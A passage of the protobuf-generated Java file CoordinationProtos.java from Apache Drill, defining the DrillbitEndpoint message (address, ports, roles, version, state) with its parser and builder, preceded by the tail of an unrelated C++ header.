} // namespace btagbtvdeep
#endif //RecoBTag_FeatureTools_SeedingTrackInfoBuilder_h
| 1,224 |
1,510 |
<filename>protocol/src/main/java/org/apache/drill/exec/proto/CoordinationProtos.java
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
// Generated by the protocol buffer compiler. DO NOT EDIT!
// source: Coordination.proto
package org.apache.drill.exec.proto;
public final class CoordinationProtos {
private CoordinationProtos() {}
public static void registerAllExtensions(
com.google.protobuf.ExtensionRegistryLite registry) {
}
public static void registerAllExtensions(
com.google.protobuf.ExtensionRegistry registry) {
registerAllExtensions(
(com.google.protobuf.ExtensionRegistryLite) registry);
}
public interface DrillbitEndpointOrBuilder extends
// @@protoc_insertion_point(interface_extends:exec.DrillbitEndpoint)
com.google.protobuf.MessageOrBuilder {
/**
* <code>optional string address = 1;</code>
* @return Whether the address field is set.
*/
boolean hasAddress();
/**
* <code>optional string address = 1;</code>
* @return The address.
*/
java.lang.String getAddress();
/**
* <code>optional string address = 1;</code>
* @return The bytes for address.
*/
com.google.protobuf.ByteString
getAddressBytes();
/**
* <code>optional int32 user_port = 2;</code>
* @return Whether the userPort field is set.
*/
boolean hasUserPort();
/**
* <code>optional int32 user_port = 2;</code>
* @return The userPort.
*/
int getUserPort();
/**
* <code>optional int32 control_port = 3;</code>
* @return Whether the controlPort field is set.
*/
boolean hasControlPort();
/**
* <code>optional int32 control_port = 3;</code>
* @return The controlPort.
*/
int getControlPort();
/**
* <code>optional int32 data_port = 4;</code>
* @return Whether the dataPort field is set.
*/
boolean hasDataPort();
/**
* <code>optional int32 data_port = 4;</code>
* @return The dataPort.
*/
int getDataPort();
/**
* <code>optional .exec.Roles roles = 5;</code>
* @return Whether the roles field is set.
*/
boolean hasRoles();
/**
* <code>optional .exec.Roles roles = 5;</code>
* @return The roles.
*/
org.apache.drill.exec.proto.CoordinationProtos.Roles getRoles();
/**
* <code>optional .exec.Roles roles = 5;</code>
*/
org.apache.drill.exec.proto.CoordinationProtos.RolesOrBuilder getRolesOrBuilder();
/**
* <code>optional string version = 6;</code>
* @return Whether the version field is set.
*/
boolean hasVersion();
/**
* <code>optional string version = 6;</code>
* @return The version.
*/
java.lang.String getVersion();
/**
* <code>optional string version = 6;</code>
* @return The bytes for version.
*/
com.google.protobuf.ByteString
getVersionBytes();
/**
* <code>optional .exec.DrillbitEndpoint.State state = 7;</code>
* @return Whether the state field is set.
*/
boolean hasState();
/**
* <code>optional .exec.DrillbitEndpoint.State state = 7;</code>
* @return The state.
*/
org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.State getState();
/**
* <code>optional int32 http_port = 8;</code>
* @return Whether the httpPort field is set.
*/
boolean hasHttpPort();
/**
* <code>optional int32 http_port = 8;</code>
* @return The httpPort.
*/
int getHttpPort();
}
/**
* Protobuf type {@code exec.DrillbitEndpoint}
*/
public static final class DrillbitEndpoint extends
com.google.protobuf.GeneratedMessageV3 implements
// @@protoc_insertion_point(message_implements:exec.DrillbitEndpoint)
DrillbitEndpointOrBuilder {
private static final long serialVersionUID = 0L;
// Use DrillbitEndpoint.newBuilder() to construct.
private DrillbitEndpoint(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) {
super(builder);
}
private DrillbitEndpoint() {
address_ = "";
version_ = "";
state_ = 0;
}
@java.lang.Override
@SuppressWarnings({"unused"})
protected java.lang.Object newInstance(
UnusedPrivateParameter unused) {
return new DrillbitEndpoint();
}
@java.lang.Override
public final com.google.protobuf.UnknownFieldSet
getUnknownFields() {
return this.unknownFields;
}
private DrillbitEndpoint(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
this();
if (extensionRegistry == null) {
throw new java.lang.NullPointerException();
}
int mutable_bitField0_ = 0;
com.google.protobuf.UnknownFieldSet.Builder unknownFields =
com.google.protobuf.UnknownFieldSet.newBuilder();
try {
boolean done = false;
while (!done) {
int tag = input.readTag();
switch (tag) {
case 0:
done = true;
break;
case 10: {
com.google.protobuf.ByteString bs = input.readBytes();
bitField0_ |= 0x00000001;
address_ = bs;
break;
}
case 16: {
bitField0_ |= 0x00000002;
userPort_ = input.readInt32();
break;
}
case 24: {
bitField0_ |= 0x00000004;
controlPort_ = input.readInt32();
break;
}
case 32: {
bitField0_ |= 0x00000008;
dataPort_ = input.readInt32();
break;
}
case 42: {
org.apache.drill.exec.proto.CoordinationProtos.Roles.Builder subBuilder = null;
if (((bitField0_ & 0x00000010) != 0)) {
subBuilder = roles_.toBuilder();
}
roles_ = input.readMessage(org.apache.drill.exec.proto.CoordinationProtos.Roles.PARSER, extensionRegistry);
if (subBuilder != null) {
subBuilder.mergeFrom(roles_);
roles_ = subBuilder.buildPartial();
}
bitField0_ |= 0x00000010;
break;
}
case 50: {
com.google.protobuf.ByteString bs = input.readBytes();
bitField0_ |= 0x00000020;
version_ = bs;
break;
}
case 56: {
int rawValue = input.readEnum();
@SuppressWarnings("deprecation")
org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.State value = org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.State.valueOf(rawValue);
if (value == null) {
unknownFields.mergeVarintField(7, rawValue);
} else {
bitField0_ |= 0x00000040;
state_ = rawValue;
}
break;
}
case 64: {
bitField0_ |= 0x00000080;
httpPort_ = input.readInt32();
break;
}
default: {
if (!parseUnknownField(
input, unknownFields, extensionRegistry, tag)) {
done = true;
}
break;
}
}
}
} catch (com.google.protobuf.InvalidProtocolBufferException e) {
throw e.setUnfinishedMessage(this);
} catch (java.io.IOException e) {
throw new com.google.protobuf.InvalidProtocolBufferException(
e).setUnfinishedMessage(this);
} finally {
this.unknownFields = unknownFields.build();
makeExtensionsImmutable();
}
}
public static final com.google.protobuf.Descriptors.Descriptor
getDescriptor() {
return org.apache.drill.exec.proto.CoordinationProtos.internal_static_exec_DrillbitEndpoint_descriptor;
}
@java.lang.Override
protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable
internalGetFieldAccessorTable() {
return org.apache.drill.exec.proto.CoordinationProtos.internal_static_exec_DrillbitEndpoint_fieldAccessorTable
.ensureFieldAccessorsInitialized(
org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.class, org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.Builder.class);
}
/**
* Protobuf enum {@code exec.DrillbitEndpoint.State}
*/
public enum State
implements com.google.protobuf.ProtocolMessageEnum {
/**
* <code>STARTUP = 0;</code>
*/
STARTUP(0),
/**
* <code>ONLINE = 1;</code>
*/
ONLINE(1),
/**
* <code>QUIESCENT = 2;</code>
*/
QUIESCENT(2),
/**
* <code>OFFLINE = 3;</code>
*/
OFFLINE(3),
;
/**
* <code>STARTUP = 0;</code>
*/
public static final int STARTUP_VALUE = 0;
/**
* <code>ONLINE = 1;</code>
*/
public static final int ONLINE_VALUE = 1;
/**
* <code>QUIESCENT = 2;</code>
*/
public static final int QUIESCENT_VALUE = 2;
/**
* <code>OFFLINE = 3;</code>
*/
public static final int OFFLINE_VALUE = 3;
public final int getNumber() {
return value;
}
/**
* @param value The numeric wire value of the corresponding enum entry.
* @return The enum associated with the given numeric wire value.
* @deprecated Use {@link #forNumber(int)} instead.
*/
@java.lang.Deprecated
public static State valueOf(int value) {
return forNumber(value);
}
/**
* @param value The numeric wire value of the corresponding enum entry.
* @return The enum associated with the given numeric wire value.
*/
public static State forNumber(int value) {
switch (value) {
case 0: return STARTUP;
case 1: return ONLINE;
case 2: return QUIESCENT;
case 3: return OFFLINE;
default: return null;
}
}
public static com.google.protobuf.Internal.EnumLiteMap<State>
internalGetValueMap() {
return internalValueMap;
}
private static final com.google.protobuf.Internal.EnumLiteMap<
State> internalValueMap =
new com.google.protobuf.Internal.EnumLiteMap<State>() {
public State findValueByNumber(int number) {
return State.forNumber(number);
}
};
public final com.google.protobuf.Descriptors.EnumValueDescriptor
getValueDescriptor() {
return getDescriptor().getValues().get(ordinal());
}
public final com.google.protobuf.Descriptors.EnumDescriptor
getDescriptorForType() {
return getDescriptor();
}
public static final com.google.protobuf.Descriptors.EnumDescriptor
getDescriptor() {
return org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.getDescriptor().getEnumTypes().get(0);
}
private static final State[] VALUES = values();
public static State valueOf(
com.google.protobuf.Descriptors.EnumValueDescriptor desc) {
if (desc.getType() != getDescriptor()) {
throw new java.lang.IllegalArgumentException(
"EnumValueDescriptor is not for this type.");
}
return VALUES[desc.getIndex()];
}
private final int value;
private State(int value) {
this.value = value;
}
// @@protoc_insertion_point(enum_scope:exec.DrillbitEndpoint.State)
}
private int bitField0_;
public static final int ADDRESS_FIELD_NUMBER = 1;
private volatile java.lang.Object address_;
/**
* <code>optional string address = 1;</code>
* @return Whether the address field is set.
*/
public boolean hasAddress() {
return ((bitField0_ & 0x00000001) != 0);
}
/**
* <code>optional string address = 1;</code>
* @return The address.
*/
public java.lang.String getAddress() {
java.lang.Object ref = address_;
if (ref instanceof java.lang.String) {
return (java.lang.String) ref;
} else {
com.google.protobuf.ByteString bs =
(com.google.protobuf.ByteString) ref;
java.lang.String s = bs.toStringUtf8();
if (bs.isValidUtf8()) {
address_ = s;
}
return s;
}
}
/**
* <code>optional string address = 1;</code>
* @return The bytes for address.
*/
public com.google.protobuf.ByteString
getAddressBytes() {
java.lang.Object ref = address_;
if (ref instanceof java.lang.String) {
com.google.protobuf.ByteString b =
com.google.protobuf.ByteString.copyFromUtf8(
(java.lang.String) ref);
address_ = b;
return b;
} else {
return (com.google.protobuf.ByteString) ref;
}
}
public static final int USER_PORT_FIELD_NUMBER = 2;
private int userPort_;
/**
* <code>optional int32 user_port = 2;</code>
* @return Whether the userPort field is set.
*/
public boolean hasUserPort() {
return ((bitField0_ & 0x00000002) != 0);
}
/**
* <code>optional int32 user_port = 2;</code>
* @return The userPort.
*/
public int getUserPort() {
return userPort_;
}
public static final int CONTROL_PORT_FIELD_NUMBER = 3;
private int controlPort_;
/**
* <code>optional int32 control_port = 3;</code>
* @return Whether the controlPort field is set.
*/
public boolean hasControlPort() {
return ((bitField0_ & 0x00000004) != 0);
}
/**
* <code>optional int32 control_port = 3;</code>
* @return The controlPort.
*/
public int getControlPort() {
return controlPort_;
}
public static final int DATA_PORT_FIELD_NUMBER = 4;
private int dataPort_;
/**
* <code>optional int32 data_port = 4;</code>
* @return Whether the dataPort field is set.
*/
public boolean hasDataPort() {
return ((bitField0_ & 0x00000008) != 0);
}
/**
* <code>optional int32 data_port = 4;</code>
* @return The dataPort.
*/
public int getDataPort() {
return dataPort_;
}
public static final int ROLES_FIELD_NUMBER = 5;
private org.apache.drill.exec.proto.CoordinationProtos.Roles roles_;
/**
* <code>optional .exec.Roles roles = 5;</code>
* @return Whether the roles field is set.
*/
public boolean hasRoles() {
return ((bitField0_ & 0x00000010) != 0);
}
/**
* <code>optional .exec.Roles roles = 5;</code>
* @return The roles.
*/
public org.apache.drill.exec.proto.CoordinationProtos.Roles getRoles() {
return roles_ == null ? org.apache.drill.exec.proto.CoordinationProtos.Roles.getDefaultInstance() : roles_;
}
/**
* <code>optional .exec.Roles roles = 5;</code>
*/
public org.apache.drill.exec.proto.CoordinationProtos.RolesOrBuilder getRolesOrBuilder() {
return roles_ == null ? org.apache.drill.exec.proto.CoordinationProtos.Roles.getDefaultInstance() : roles_;
}
public static final int VERSION_FIELD_NUMBER = 6;
private volatile java.lang.Object version_;
/**
* <code>optional string version = 6;</code>
* @return Whether the version field is set.
*/
public boolean hasVersion() {
return ((bitField0_ & 0x00000020) != 0);
}
/**
* <code>optional string version = 6;</code>
* @return The version.
*/
public java.lang.String getVersion() {
java.lang.Object ref = version_;
if (ref instanceof java.lang.String) {
return (java.lang.String) ref;
} else {
com.google.protobuf.ByteString bs =
(com.google.protobuf.ByteString) ref;
java.lang.String s = bs.toStringUtf8();
if (bs.isValidUtf8()) {
version_ = s;
}
return s;
}
}
/**
* <code>optional string version = 6;</code>
* @return The bytes for version.
*/
public com.google.protobuf.ByteString
getVersionBytes() {
java.lang.Object ref = version_;
if (ref instanceof java.lang.String) {
com.google.protobuf.ByteString b =
com.google.protobuf.ByteString.copyFromUtf8(
(java.lang.String) ref);
version_ = b;
return b;
} else {
return (com.google.protobuf.ByteString) ref;
}
}
public static final int STATE_FIELD_NUMBER = 7;
private int state_;
/**
* <code>optional .exec.DrillbitEndpoint.State state = 7;</code>
* @return Whether the state field is set.
*/
public boolean hasState() {
return ((bitField0_ & 0x00000040) != 0);
}
/**
* <code>optional .exec.DrillbitEndpoint.State state = 7;</code>
* @return The state.
*/
public org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.State getState() {
@SuppressWarnings("deprecation")
org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.State result = org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.State.valueOf(state_);
return result == null ? org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.State.STARTUP : result;
}
public static final int HTTP_PORT_FIELD_NUMBER = 8;
private int httpPort_;
/**
* <code>optional int32 http_port = 8;</code>
* @return Whether the httpPort field is set.
*/
public boolean hasHttpPort() {
return ((bitField0_ & 0x00000080) != 0);
}
/**
* <code>optional int32 http_port = 8;</code>
* @return The httpPort.
*/
public int getHttpPort() {
return httpPort_;
}
private byte memoizedIsInitialized = -1;
@java.lang.Override
public final boolean isInitialized() {
byte isInitialized = memoizedIsInitialized;
if (isInitialized == 1) return true;
if (isInitialized == 0) return false;
memoizedIsInitialized = 1;
return true;
}
@java.lang.Override
public void writeTo(com.google.protobuf.CodedOutputStream output)
throws java.io.IOException {
if (((bitField0_ & 0x00000001) != 0)) {
com.google.protobuf.GeneratedMessageV3.writeString(output, 1, address_);
}
if (((bitField0_ & 0x00000002) != 0)) {
output.writeInt32(2, userPort_);
}
if (((bitField0_ & 0x00000004) != 0)) {
output.writeInt32(3, controlPort_);
}
if (((bitField0_ & 0x00000008) != 0)) {
output.writeInt32(4, dataPort_);
}
if (((bitField0_ & 0x00000010) != 0)) {
output.writeMessage(5, getRoles());
}
if (((bitField0_ & 0x00000020) != 0)) {
com.google.protobuf.GeneratedMessageV3.writeString(output, 6, version_);
}
if (((bitField0_ & 0x00000040) != 0)) {
output.writeEnum(7, state_);
}
if (((bitField0_ & 0x00000080) != 0)) {
output.writeInt32(8, httpPort_);
}
unknownFields.writeTo(output);
}
@java.lang.Override
public int getSerializedSize() {
int size = memoizedSize;
if (size != -1) return size;
size = 0;
if (((bitField0_ & 0x00000001) != 0)) {
size += com.google.protobuf.GeneratedMessageV3.computeStringSize(1, address_);
}
if (((bitField0_ & 0x00000002) != 0)) {
size += com.google.protobuf.CodedOutputStream
.computeInt32Size(2, userPort_);
}
if (((bitField0_ & 0x00000004) != 0)) {
size += com.google.protobuf.CodedOutputStream
.computeInt32Size(3, controlPort_);
}
if (((bitField0_ & 0x00000008) != 0)) {
size += com.google.protobuf.CodedOutputStream
.computeInt32Size(4, dataPort_);
}
if (((bitField0_ & 0x00000010) != 0)) {
size += com.google.protobuf.CodedOutputStream
.computeMessageSize(5, getRoles());
}
if (((bitField0_ & 0x00000020) != 0)) {
size += com.google.protobuf.GeneratedMessageV3.computeStringSize(6, version_);
}
if (((bitField0_ & 0x00000040) != 0)) {
size += com.google.protobuf.CodedOutputStream
.computeEnumSize(7, state_);
}
if (((bitField0_ & 0x00000080) != 0)) {
size += com.google.protobuf.CodedOutputStream
.computeInt32Size(8, httpPort_);
}
size += unknownFields.getSerializedSize();
memoizedSize = size;
return size;
}
@java.lang.Override
public boolean equals(final java.lang.Object obj) {
if (obj == this) {
return true;
}
if (!(obj instanceof org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint)) {
return super.equals(obj);
}
org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint other = (org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint) obj;
if (hasAddress() != other.hasAddress()) return false;
if (hasAddress()) {
if (!getAddress()
.equals(other.getAddress())) return false;
}
if (hasUserPort() != other.hasUserPort()) return false;
if (hasUserPort()) {
if (getUserPort()
!= other.getUserPort()) return false;
}
if (hasControlPort() != other.hasControlPort()) return false;
if (hasControlPort()) {
if (getControlPort()
!= other.getControlPort()) return false;
}
if (hasDataPort() != other.hasDataPort()) return false;
if (hasDataPort()) {
if (getDataPort()
!= other.getDataPort()) return false;
}
if (hasRoles() != other.hasRoles()) return false;
if (hasRoles()) {
if (!getRoles()
.equals(other.getRoles())) return false;
}
if (hasVersion() != other.hasVersion()) return false;
if (hasVersion()) {
if (!getVersion()
.equals(other.getVersion())) return false;
}
if (hasState() != other.hasState()) return false;
if (hasState()) {
if (state_ != other.state_) return false;
}
if (hasHttpPort() != other.hasHttpPort()) return false;
if (hasHttpPort()) {
if (getHttpPort()
!= other.getHttpPort()) return false;
}
if (!unknownFields.equals(other.unknownFields)) return false;
return true;
}
@java.lang.Override
public int hashCode() {
if (memoizedHashCode != 0) {
return memoizedHashCode;
}
int hash = 41;
hash = (19 * hash) + getDescriptor().hashCode();
if (hasAddress()) {
hash = (37 * hash) + ADDRESS_FIELD_NUMBER;
hash = (53 * hash) + getAddress().hashCode();
}
if (hasUserPort()) {
hash = (37 * hash) + USER_PORT_FIELD_NUMBER;
hash = (53 * hash) + getUserPort();
}
if (hasControlPort()) {
hash = (37 * hash) + CONTROL_PORT_FIELD_NUMBER;
hash = (53 * hash) + getControlPort();
}
if (hasDataPort()) {
hash = (37 * hash) + DATA_PORT_FIELD_NUMBER;
hash = (53 * hash) + getDataPort();
}
if (hasRoles()) {
hash = (37 * hash) + ROLES_FIELD_NUMBER;
hash = (53 * hash) + getRoles().hashCode();
}
if (hasVersion()) {
hash = (37 * hash) + VERSION_FIELD_NUMBER;
hash = (53 * hash) + getVersion().hashCode();
}
if (hasState()) {
hash = (37 * hash) + STATE_FIELD_NUMBER;
hash = (53 * hash) + state_;
}
if (hasHttpPort()) {
hash = (37 * hash) + HTTP_PORT_FIELD_NUMBER;
hash = (53 * hash) + getHttpPort();
}
hash = (29 * hash) + unknownFields.hashCode();
memoizedHashCode = hash;
return hash;
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint parseFrom(
java.nio.ByteBuffer data)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint parseFrom(
java.nio.ByteBuffer data,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data, extensionRegistry);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint parseFrom(
com.google.protobuf.ByteString data)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint parseFrom(
com.google.protobuf.ByteString data,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data, extensionRegistry);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint parseFrom(byte[] data)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint parseFrom(
byte[] data,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data, extensionRegistry);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint parseFrom(java.io.InputStream input)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseWithIOException(PARSER, input);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint parseFrom(
java.io.InputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseWithIOException(PARSER, input, extensionRegistry);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint parseDelimitedFrom(java.io.InputStream input)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseDelimitedWithIOException(PARSER, input);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint parseDelimitedFrom(
java.io.InputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseDelimitedWithIOException(PARSER, input, extensionRegistry);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint parseFrom(
com.google.protobuf.CodedInputStream input)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseWithIOException(PARSER, input);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint parseFrom(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseWithIOException(PARSER, input, extensionRegistry);
}
@java.lang.Override
public Builder newBuilderForType() { return newBuilder(); }
public static Builder newBuilder() {
return DEFAULT_INSTANCE.toBuilder();
}
public static Builder newBuilder(org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint prototype) {
return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype);
}
@java.lang.Override
public Builder toBuilder() {
return this == DEFAULT_INSTANCE
? new Builder() : new Builder().mergeFrom(this);
}
@java.lang.Override
protected Builder newBuilderForType(
com.google.protobuf.GeneratedMessageV3.BuilderParent parent) {
Builder builder = new Builder(parent);
return builder;
}
/**
* Protobuf type {@code exec.DrillbitEndpoint}
*/
public static final class Builder extends
com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements
// @@protoc_insertion_point(builder_implements:exec.DrillbitEndpoint)
org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpointOrBuilder {
public static final com.google.protobuf.Descriptors.Descriptor
getDescriptor() {
return org.apache.drill.exec.proto.CoordinationProtos.internal_static_exec_DrillbitEndpoint_descriptor;
}
@java.lang.Override
protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable
internalGetFieldAccessorTable() {
return org.apache.drill.exec.proto.CoordinationProtos.internal_static_exec_DrillbitEndpoint_fieldAccessorTable
.ensureFieldAccessorsInitialized(
org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.class, org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.Builder.class);
}
// Construct using org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.newBuilder()
private Builder() {
maybeForceBuilderInitialization();
}
private Builder(
com.google.protobuf.GeneratedMessageV3.BuilderParent parent) {
super(parent);
maybeForceBuilderInitialization();
}
private void maybeForceBuilderInitialization() {
if (com.google.protobuf.GeneratedMessageV3
.alwaysUseFieldBuilders) {
getRolesFieldBuilder();
}
}
@java.lang.Override
public Builder clear() {
super.clear();
address_ = "";
bitField0_ = (bitField0_ & ~0x00000001);
userPort_ = 0;
bitField0_ = (bitField0_ & ~0x00000002);
controlPort_ = 0;
bitField0_ = (bitField0_ & ~0x00000004);
dataPort_ = 0;
bitField0_ = (bitField0_ & ~0x00000008);
if (rolesBuilder_ == null) {
roles_ = null;
} else {
rolesBuilder_.clear();
}
bitField0_ = (bitField0_ & ~0x00000010);
version_ = "";
bitField0_ = (bitField0_ & ~0x00000020);
state_ = 0;
bitField0_ = (bitField0_ & ~0x00000040);
httpPort_ = 0;
bitField0_ = (bitField0_ & ~0x00000080);
return this;
}
@java.lang.Override
public com.google.protobuf.Descriptors.Descriptor
getDescriptorForType() {
return org.apache.drill.exec.proto.CoordinationProtos.internal_static_exec_DrillbitEndpoint_descriptor;
}
@java.lang.Override
public org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint getDefaultInstanceForType() {
return org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.getDefaultInstance();
}
@java.lang.Override
public org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint build() {
org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint result = buildPartial();
if (!result.isInitialized()) {
throw newUninitializedMessageException(result);
}
return result;
}
@java.lang.Override
public org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint buildPartial() {
org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint result = new org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint(this);
int from_bitField0_ = bitField0_;
int to_bitField0_ = 0;
if (((from_bitField0_ & 0x00000001) != 0)) {
to_bitField0_ |= 0x00000001;
}
result.address_ = address_;
if (((from_bitField0_ & 0x00000002) != 0)) {
result.userPort_ = userPort_;
to_bitField0_ |= 0x00000002;
}
if (((from_bitField0_ & 0x00000004) != 0)) {
result.controlPort_ = controlPort_;
to_bitField0_ |= 0x00000004;
}
if (((from_bitField0_ & 0x00000008) != 0)) {
result.dataPort_ = dataPort_;
to_bitField0_ |= 0x00000008;
}
if (((from_bitField0_ & 0x00000010) != 0)) {
if (rolesBuilder_ == null) {
result.roles_ = roles_;
} else {
result.roles_ = rolesBuilder_.build();
}
to_bitField0_ |= 0x00000010;
}
if (((from_bitField0_ & 0x00000020) != 0)) {
to_bitField0_ |= 0x00000020;
}
result.version_ = version_;
if (((from_bitField0_ & 0x00000040) != 0)) {
to_bitField0_ |= 0x00000040;
}
result.state_ = state_;
if (((from_bitField0_ & 0x00000080) != 0)) {
result.httpPort_ = httpPort_;
to_bitField0_ |= 0x00000080;
}
result.bitField0_ = to_bitField0_;
onBuilt();
return result;
}
@java.lang.Override
public Builder clone() {
return super.clone();
}
@java.lang.Override
public Builder setField(
com.google.protobuf.Descriptors.FieldDescriptor field,
java.lang.Object value) {
return super.setField(field, value);
}
@java.lang.Override
public Builder clearField(
com.google.protobuf.Descriptors.FieldDescriptor field) {
return super.clearField(field);
}
@java.lang.Override
public Builder clearOneof(
com.google.protobuf.Descriptors.OneofDescriptor oneof) {
return super.clearOneof(oneof);
}
@java.lang.Override
public Builder setRepeatedField(
com.google.protobuf.Descriptors.FieldDescriptor field,
int index, java.lang.Object value) {
return super.setRepeatedField(field, index, value);
}
@java.lang.Override
public Builder addRepeatedField(
com.google.protobuf.Descriptors.FieldDescriptor field,
java.lang.Object value) {
return super.addRepeatedField(field, value);
}
@java.lang.Override
public Builder mergeFrom(com.google.protobuf.Message other) {
if (other instanceof org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint) {
return mergeFrom((org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint)other);
} else {
super.mergeFrom(other);
return this;
}
}
public Builder mergeFrom(org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint other) {
if (other == org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.getDefaultInstance()) return this;
if (other.hasAddress()) {
bitField0_ |= 0x00000001;
address_ = other.address_;
onChanged();
}
if (other.hasUserPort()) {
setUserPort(other.getUserPort());
}
if (other.hasControlPort()) {
setControlPort(other.getControlPort());
}
if (other.hasDataPort()) {
setDataPort(other.getDataPort());
}
if (other.hasRoles()) {
mergeRoles(other.getRoles());
}
if (other.hasVersion()) {
bitField0_ |= 0x00000020;
version_ = other.version_;
onChanged();
}
if (other.hasState()) {
setState(other.getState());
}
if (other.hasHttpPort()) {
setHttpPort(other.getHttpPort());
}
this.mergeUnknownFields(other.unknownFields);
onChanged();
return this;
}
@java.lang.Override
public final boolean isInitialized() {
return true;
}
@java.lang.Override
public Builder mergeFrom(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint parsedMessage = null;
try {
parsedMessage = PARSER.parsePartialFrom(input, extensionRegistry);
} catch (com.google.protobuf.InvalidProtocolBufferException e) {
parsedMessage = (org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint) e.getUnfinishedMessage();
throw e.unwrapIOException();
} finally {
if (parsedMessage != null) {
mergeFrom(parsedMessage);
}
}
return this;
}
private int bitField0_;
private java.lang.Object address_ = "";
/**
* <code>optional string address = 1;</code>
* @return Whether the address field is set.
*/
public boolean hasAddress() {
return ((bitField0_ & 0x00000001) != 0);
}
/**
* <code>optional string address = 1;</code>
* @return The address.
*/
public java.lang.String getAddress() {
java.lang.Object ref = address_;
if (!(ref instanceof java.lang.String)) {
com.google.protobuf.ByteString bs =
(com.google.protobuf.ByteString) ref;
java.lang.String s = bs.toStringUtf8();
if (bs.isValidUtf8()) {
address_ = s;
}
return s;
} else {
return (java.lang.String) ref;
}
}
/**
* <code>optional string address = 1;</code>
* @return The bytes for address.
*/
public com.google.protobuf.ByteString
getAddressBytes() {
java.lang.Object ref = address_;
if (ref instanceof String) {
com.google.protobuf.ByteString b =
com.google.protobuf.ByteString.copyFromUtf8(
(java.lang.String) ref);
address_ = b;
return b;
} else {
return (com.google.protobuf.ByteString) ref;
}
}
/**
* <code>optional string address = 1;</code>
* @param value The address to set.
* @return This builder for chaining.
*/
public Builder setAddress(
java.lang.String value) {
if (value == null) {
throw new NullPointerException();
}
bitField0_ |= 0x00000001;
address_ = value;
onChanged();
return this;
}
/**
